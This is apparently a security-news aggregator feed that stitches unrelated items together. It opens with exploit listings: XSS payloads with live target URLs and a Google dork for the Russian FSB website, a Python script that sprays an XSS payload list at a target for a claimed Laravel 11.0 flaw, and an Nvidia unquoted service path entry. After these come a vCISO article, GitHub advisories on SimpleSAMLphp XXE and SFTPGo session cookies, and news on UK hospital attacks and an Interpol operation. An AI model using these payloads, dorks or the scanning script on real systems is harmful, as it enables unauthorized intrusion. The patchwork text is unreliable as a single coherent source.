The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Laravel 11.0 Cross Site Scripting

Nvidia GeForce version 11.0.1.163 suffers from an unquoted service path vulnerability.

    # Exploit Title: Nvidia GeForce v11.0.1.163 - Unquoted Service Path# Date: 2024-11-25# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: miladgrayhat@gmail.com# t.me/Ci3c0# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor Homepage: https://www.nvidia.com/es-la/# Software Link: https://www.nvidia.com/es-la/# Version: 11.0.1.163# Tested on: Windows 10 Pro x64 EspC:\>wmic service get name, pathname, displayname, startmode | findstr"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v"""NVIDIA Update Service Daemon      nvUpdatusService                          C:\Program Files(x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe                                                 AutoC:\>sc qc nvUpdatusService[SC] QueryServiceConfig CORRECTONOMBRE_SERVICIO: nvUpdatusService        TIPO               : 10  WIN32_OWN_PROCESS        TIPO_INICIO        : 2   AUTO_START  (DELAYED)        CONTROL_ERROR      : 1   NORMAL        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIACorporation\NVIDIA Updatus\daemonu.exe        GRUPO_ORDEN_CARGA  :        ETIQUETA           : 0        NOMBRE_MOSTRAR     : NVIDIA Update Service Daemon        DEPENDENCIAS       :        NOMBRE_INICIO_SERVICIO: .\UpdatusUser

Nvidia GeForce 11.0.1.163 Unquoted Service Path

With cybersecurity talent hard to come by and companies increasingly looking for guidance and best practices, virtual and fractional chief information security officers can make a lot of sense.

Source: Gorodenkoff via Shutterstock

Numerous paths lead a company to retain a virtual chief information security officer (vCISO).

Companies that work with managed security service providers (MSSPs) may need to expand their security strategy and thus engage a vCISO. Following a breach, an incident response firm may recommend that the business develop a proactive security and response plan by hiring a part-time CISO. Venture capitalists may need a security expert to do due diligence during a merger or acquisition. Even cyber insurers now recommend vCISOs to policyholders to shepherd them through the process of developing best practices.

In the end, a virtual CISO gives a company an expert who can manage the security program of the business in a consistent way and often brings a different perspective, helping security teams see the forest and not just the trees, says Thomas Siu, CISO at Inversion6, a provider of virtual CISO services.

"We have a chance to step back from the business process or even the client because we're distant enough that we can look at the whole big picture," he says. "As a CISO, I could still bring in a fractional CISO to look at specific problem space for me — sometimes, the tree-forest issue does occur."

Virtual and fractional CISOs are taking off. While the shortage in cybersecurity-skilled executives makes hiring a full time CISO an expensive proposition, paying for a part-time leader to manage the overall security strategy often makes sense. While a consultant might fit the bill, often companies want an expert who could provide a consistent viewpoint based on an agreed-upon strategy or a fractional CISO who has specific skills or knowledge, such as in operational technology or a certain region's regulations.

Whether the hiring impetus is a merger, a cyber-insurance policy, or a security incident, a virtual CISO can help a company develop a long-term strategy, says Adam Tyra, general manager of security services at cyber-insurance firm At-Bay, which offers managed services and vCISO services.

"Most companies are only having that insurance conversation once a year, and then they don't have it again until it's time for the policy to renew, but the threat landscape is going to change continuously," he says. "You should be doing a lot more than the minimum that's required just to get insurance, and that's where your vCISO can help."

**Lost Your CISO? Consider a vCISO**

For Inversion6's Siu, the path to becoming a virtual CISO started with his work for an MSSP, handling discrete projects for clients. A former CISO at Michigan State University and Case Western Reserve University, Siu acted as a vCISO for a company doing executive protection, where he would create a cybersecurity plan for the company at risk and regularly check in to make sure the plan was being followed. Companies would also contact Siu to fill a gap when an existing CISO decided to move on.

"Somebody would lose their CISO, and they needed someone step in to do the program — it turned out to be a different economic model to have a vendor run that kind of strategic business advisory service long term," he says. "You weren't so much involved operationally. You were helping them with their budgets. You were helping them with their strategy. So you could dial it up as much as you want or dial it back, but you had to always be on call."

Typically companies in need of a vCISO reach out for one of three reasons: to meet their regulatory or contractual security requirements, to meet or exceed industry norms for cybersecurity, or to build a security program as a competitive differentiator, says At-Bay's Tyra.

"If you are a company that has a robust IT capability where you can implement all your own systems, and you're good at managing all your technology, a vCISO service may be all that you need," he says. "You get pointed in the right direction, with a punch list of projects to go execute, and then you have the IT capability to go do those things."

**When a vCISO Is Not Enough**

Yet often having a plan is not the same as executing a plan. In those cases, companies may want to seek out managed security services to acquire specific cybersecurity capabilities. Determining whether a company needs more than a vCISO is, oddly enough, a good job for a vCISO, says At-Bay's Tyra.

"This is an area where I think a lot of companies are not honest with themselves about whether or not they have those capabilities internally," he says. "That's another area where a vCISO could potentially provide input, helping people figure out if the advice going to be good enough or \[if\] you need actual hands on your systems to get where you're trying to go."

Finally, as new threats arise, companies often want to know how they could be impacted. Because vCISO services often have a depth of expertise that companies cannot retain on staff, they can come in and provide recommendations to deal with new technologies, like artificial intelligence, or changes to the threat landscape, says Inversion6's Siu.

"Even if someone has a security program already, they bring us in to touch places that they just don't have the depth for, which they might not even be able to hire for, because it's so specialized," he says. "We can use that to help people understand where those particular \[threats\] fit into their overall risk profile."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Does Your Company Need a Virtual CISO?

# Summary
When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE.

## Mitigation:

Remove the `LIBXML_DTDLOAD | LIBXML_DTDATTR` options from `$options` is in: https://github.com/simplesamlphp/saml2/blob/717c0adc4877ebd58428637e5626345e59fa0109/src/SAML2/DOMDocumentFactory.php#L41

## Background / details

To be published on Dec 8th

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-pxm4-r5ph-q2m2: SimpleSAMLphp SAML2 has an XXE in parsing SAML messages

### Impact

The OpenID Connect implementation, in the affected SFTPGo versions, allows authenticated users to brute force session cookies and thereby gain access to other users' data, since the cookies are generated predictably using the [xid](https://github.com/rs/xid) library and are therefore unique but not cryptographically secure.

### Patches

This issue was fixed in version v2.6.4, where cookies are opaque and cryptographically secure strings.

### References

https://github.com/drakkan/sftpgo/commit/f30a9a2095bf90c0661b04fe038e3b7efc788bc6


GHSA-6943-qr24-82vx: sftpgo vulnerable to brute force takeover of OpenID Connect session cookies

# Summary
When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE.

## Mitigation:

Remove the `LIBXML_DTDLOAD | LIBXML_DTDATTR` options from `$options` is in: https://github.com/simplesamlphp/saml2/blob/717c0adc4877ebd58428637e5626345e59fa0109/src/SAML2/DOMDocumentFactory.php#L41

## Background / details

To be published on Dec 8.

GHSA-2x65-fpch-2fcm: SimpleSAMLphp xml-common XXE vulnerability

Alder Hey Children's Hospital got hit with a ransomware attack, while the nature of an incident at Wirral University Teaching Hospital remains undisclosed.

Source: Dennis Gross via Alamy Stock Photo

Two hospitals affiliated with the UK's National Health Service (NHS) were victims of cyberattacks in the past week, though the incidents are not believed to be connected.

Alder Hey Children's Hospital said patient records and other information were compromised and has launched an investigation.

"We are aware that data has been published online and shared via social media that purports to have been obtained illegally from systems shared by Alder Hey and Liverpool Heart and Chest Hospital NHS Foundation Trust," the hospital wrote in a statement. "We are working with partners to verify the data that has been published and to understand the potential impact."

Inc ransomware claimed responsibility for the hack, adding Alder Hey to its leak site, alleging that the stolen data, which includes patient records and donor reports, dates back to 2018.

The second cyberattack affected Wirral University Teaching Hospital, which reported that it detected suspicious activity, prompting it to isolate systems resulting in certain IT systems going offline. 

"While \[medical\] services continue to be available, there has been disruption to planned services, for example, some scheduled appointments are affected," the hospital stated in its update. "Unfortunately we have had to postpone some procedures, which will be rescheduled."

As it works to resolve the "cybersecurity incident," it remains unclear who the perpetrator was and or the kind of attack they used.

**About the Author**

2 UK Hospitals Targeted in Separate Cyberattacks

SUMMARY A global operation, led by INTERPOL, nets over 5,500 cybercriminals and seizes $400 million in stolen funds.…

****SUMMARY****

*   **Global Crackdown:** INTERPOL’s Operation HAECHI V led to 5,500 arrests across 40 countries.

*   **Major Recovery:** $400 million in stolen funds were intercepted and recovered.

*   **Cybercrime Targets:** Focus on voice phishing, crypto scams, and business email compromise.

*   **Key Tool:** INTERPOL’s I-GRIP initiative played a vital role in tracking illicit funds.

*   **Collaboration Wins:** Success attributed to international law enforcement cooperation.

A global operation, led by **INTERPOL**, nets over 5,500 cybercriminals and seizes $400 million in stolen funds. Learn about the latest tactics used by cybercriminals and how law enforcement agencies are fighting back.

In a coordinated global effort, law enforcement agencies from 40 countries have successfully dismantled a vast network of cyber criminals, leading to the arrest of over 5,500 individuals and the seizure of more than $400 million in illicit funds.

This development follows the agency’s recent success with “**Operation Serengeti**,” which arrested over 1,000 cybercriminals and dismantled significant cybercrime networks across multiple African countries just last week.

Operation HAECHI V, the fifth iteration of a successful South Korean government-sponsored cyber-policing initiative was a five-month operation spanning from July to November 2024. It targeted a range of cyber-enabled frauds including voice phishing, romance scams, online sextortion, investment fraud, illegal online gambling, business email compromise, and e-commerce fraud.

INTERPOL’s Global Rapid Intervention of Payments (I-GRIP) initiative was instrumental in intercepting stolen funds and bringing criminals to justice. The agency also issued a Purple Notice, alerting countries about a new cryptocurrency fraud involving stablecoins and member countries were warned about an emerging USDT Token Approval Scam.

One of the most significant achievements of the operation was the dismantling of a sprawling voice phishing syndicate operating in East Asia with collaborated efforts from South Korean and Chinese agencies. This syndicate, responsible for defrauding over 1,900 victims of a staggering $1.1 billion, employed sophisticated tactics such as impersonating law enforcement officials and using counterfeit identification.

I-GRIP helped agencies intercept stolen funds sent to cybercriminals, preventing losses and leading to the arrest of additional suspects. In one notable case, the Singapore Police Force, in collaboration with authorities in Timor Leste, successfully intercepted $39.3 million of a $42.3 million sum stolen from a Singaporean company through a **business** **email compromise** (BEC) fraud.

In addition, in the UK’s Channel Islands, the Guernsey Financial Intelligence Unit intercepted £ 2 million ($ 2.5 million) in funds also stolen via BEC through an I-GRIP request to Portugal. This demonstrates the effectiveness of I-GRIP in combating cross-border cybercrime.

The arrest of over 5,500 individuals is certainly a commendable achievement, but it’s likely lower-level call centre operators targeting fewer victims for smaller pay-outs, said **Toby Lewis**, Global Head of Threat Analysis at Darktrace.

_“_These groups target high volumes of victims for smaller payouts, rather than the larger ransomware payouts we see from more sophisticated actors, explained Toby._“_ _“_These are operations that typically operate at scale, stealing 1,000s of USD at a time, which then adds up, rather than a smaller number of big-time operations such as ransomware, which may net 100,000s of USD per target._“_

_“_The stablecoin romance scams show criminals adapting classic social engineering for the crypto era – combining emotional manipulation with cryptocurrency’s complexity to trick victims into granting account access,_“_ Lewis stated, sharing his response on Operation HAECHI V with Hackread.com.

Nevertheless, it will have a positive impact in **reducing cybercrimes**. The operation’s success can be attributed to the collaborative efforts of law enforcement agencies worldwide, as well as the effective use of Interpol’s I-GRIP initiative.  

Right from the control room (Interpol)

INTERPOL Secretary General Valdecy Urquiza emphasized the importance of international cooperation in addressing the growing threat of cybercrime. “The borderless nature of cybercrime means international police cooperation is essential,” he said. “The success of this operation shows what can be achieved when countries work together.”

Lee Jun Hyeong, Head of Korea’s INTERPOL National Central Bureau in Seoul, praised the dedication and professionalism of law enforcement officers worldwide. “Our efforts not only brought criminals to justice but also achieved significant progress in intercepting and recovering illicit funds,” Hyeong noted in Interpol’s **press release**.

1.  **INTERPOL Arrests 41, Takes Down 22,000 Malicious IPs**
2.  **Interpol Nets $300 Million, Arrests 3,500 in Cyber Crime Bust**
3.  **Op Narsil – INTERPOL Busts Decade-Old Child Abuse Network**
4.  **INTERPOL Dismantles Infamous ’16shop’ Phishing-as-a-Service**
5.  **Interpol Busts Human Traffickers Luring Victims with Fake Job Ads**

Op HAECHI V: Interpol Arrests 5,500 Cybercriminals, Recovers $400 Million

The usage of String.toLowerCase() and String.toUpperCase() has some Locale dependent exceptions that could potentially result in authorization rules not working properly.

Tag

#auth